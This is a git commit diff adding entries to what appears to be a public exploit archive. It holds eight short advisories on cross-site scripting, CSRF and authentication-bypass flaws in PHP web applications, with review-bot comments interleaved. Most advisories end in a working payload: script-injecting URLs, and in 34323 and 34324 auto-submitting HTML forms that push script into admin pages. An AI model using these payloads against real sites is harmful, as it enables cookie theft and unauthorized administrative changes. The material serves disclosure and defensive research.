Updated 08_13_2014
parent
77dff34f06
commit
61b227234d
9 changed files with 112 additions and 0 deletions
|
@ -30910,3 +30910,11 @@ id,file,description,date,author,platform,type,port
|
|||
34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
|
||||
34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
|
||||
34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0
|
||||
34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 '228-recherche.php' Cross Site Scripting Vulnerability",2009-12-13,loneferret,php,webapps,0
|
||||
34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-13,bi0,php,webapps,0
|
||||
34319,platforms/php/webapps/34319.txt,"Ez Cart 'index.php' Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
|
||||
34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0
|
||||
34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-07-15,"Nijel the Destroyer",php,webapps,0
|
||||
34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 'phpwcms.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 'modmenu.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34324,platforms/php/webapps/34324.txt,"FestOS 2.3 'contents' Parameter Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
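Review bot: In the 34320 row the description ("GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS") does not follow the pattern of the other added rows, which quote the script name and end in "Cross Site Scripting Vulnerability"; rewording it to match keeps title searches on the index consistent. Two rows also give a version that differs from the advisory files added in this commit: the 34317 row says "Automne 4.0" where 34317.txt says 4.0.0rc2, and the 34324 row says "FestOS 2.3" where 34324.txt says 2.3b.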
|
10
platforms/php/webapps/34317.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41686/info
|
||||
|
||||
Automne is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Automne version 4.0.0rc2 is vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
http://www.example.com/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)">
|
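Review bot: The description never names the affected input; only the example URL on the last line shows that it is the q parameter of 228-recherche.php. A sentence stating the script and parameter would let a reader match this file to its index row without parsing the URL. The file is also listed as "Executable file" although it is a plain-text advisory, so it should be committed with a non-executable mode.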
14
platforms/php/webapps/34318.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/41689/info
|
||||
|
||||
|
||||
Zeecareers is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
|
||||
|
||||
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The attacker may leverage the authentication-bypass issues to access information without proper authentication.
|
||||
|
||||
Zeecareers version 2.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/basic_search_result.php?title=[XSS]
|
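Review bot: The text reports "multiple authentication-bypass vulnerabilities", but nothing after that sentence says which scripts or requests are affected; the single example URI (basic_search_result.php?title=[XSS]) covers only the cross-site scripting issue. Either name the components affected by the authentication bypass so maintainers know what to check, or scope the entry to the XSS issue.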
10
platforms/php/webapps/34319.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41696/info
|
||||
|
||||
Ez Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script>
|
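Review bot: No affected version is given anywhere in this file. The other advisories in this commit carry a "version X is vulnerable; other versions may also be affected" line, while here the text goes from the impact paragraph straight to "The following example URI is available:". Add the tested version, or say explicitly that it is unknown. The prose also leaves the affected parameter (sid in index.php) unnamed.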
25
platforms/php/webapps/34320.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/41697/info
|
||||
|
||||
GetSimple CMS is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, an HTML-injection vulnerability, and a directory-traversal vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to retrieve and possibly execute arbitrary files through the use of directory-traversal strings, to obtain potentially sensitive information, or to execute arbitrary local scripts in the context of the webserver process.
|
||||
|
||||
GetSimple CMS 2.01 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS]
|
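Review bot: The summary lists local file-include, HTML-injection and directory-traversal issues in addition to XSS, yet every example URI targets admin/template/error_checking.php with an [XSS] placeholder (the i18n[...] keys and msg). The other three classes have no affected script or parameter documented, so the entry cannot be used to verify a fix for them. Document where they occur, or trim the summary to match the index title, which mentions only "Multiple Parameter XSS".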
9
platforms/php/webapps/34321.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41701/info
|
||||
|
||||
Spitfire is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
|
||||
|
||||
Spitfire 1.0.381 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>
|
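Review bot: The cross-site request-forgery issue named in the first sentence is not documented further: the only example is the search parameter of cont_index.php, and no affected action is named for the CSRF. State which request lacks protection, or limit the description to XSS. The PAGE_ID placeholder in the example URL also needs a word of explanation.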
9
platforms/php/webapps/34322.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41720/info
|
||||
|
||||
phpwcms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
phpwcms 1.4.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http:/www.example.com/phpwcms.php?do=modules&module=calendar&calendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22
|
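Review bot: The example URL on the last line starts with "http:/www.example.com" (one slash after the scheme), so it is not a well-formed URL as written; it should begin "http://www.example.com/phpwcms.php". The prose also omits that calendardate is the affected parameter, which is visible only in the URL.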
18
platforms/php/webapps/34323.html
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/41724/info
|
||||
|
||||
DSite CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
DSite CMS 4.81 is vulnerable; prior versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >
|
||||
<input type="hidden" name="module" value="menu" />
|
||||
<input type="hidden" name="plitem" value="modmenu.php" />
|
||||
<input type="hidden" name="menu_id" value="1" />
|
||||
<input type="hidden" name="button_name" value='bn"><script>alert(document.cookie)</script>' />
|
||||
<input type="hidden" name="new_make" value="YES" />
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
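Review bot: This file is a live HTML page rather than a text advisory: the closing script block calls document.main.submit(), so opening 34323.html in a browser sends the POST at once, and the file is listed as "Executable file". Consider storing it as .txt like the other entries in this commit, or add a line above the form saying that it auto-submits. The text also never names button_name as the affected field.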
9
platforms/php/webapps/34324.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41725/info
|
||||
|
||||
FestOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
FestOS version 2.3b is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script>
|
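Review bot: The form, its four hidden inputs and the script are collapsed onto one line here, while the equivalent form in 34323.html puts one element per line; splitting it the same way would make the affected field (contents) readable. The version also disagrees with the index: this file says "FestOS version 2.3b", while the index row for 34324 says "FestOS 2.3".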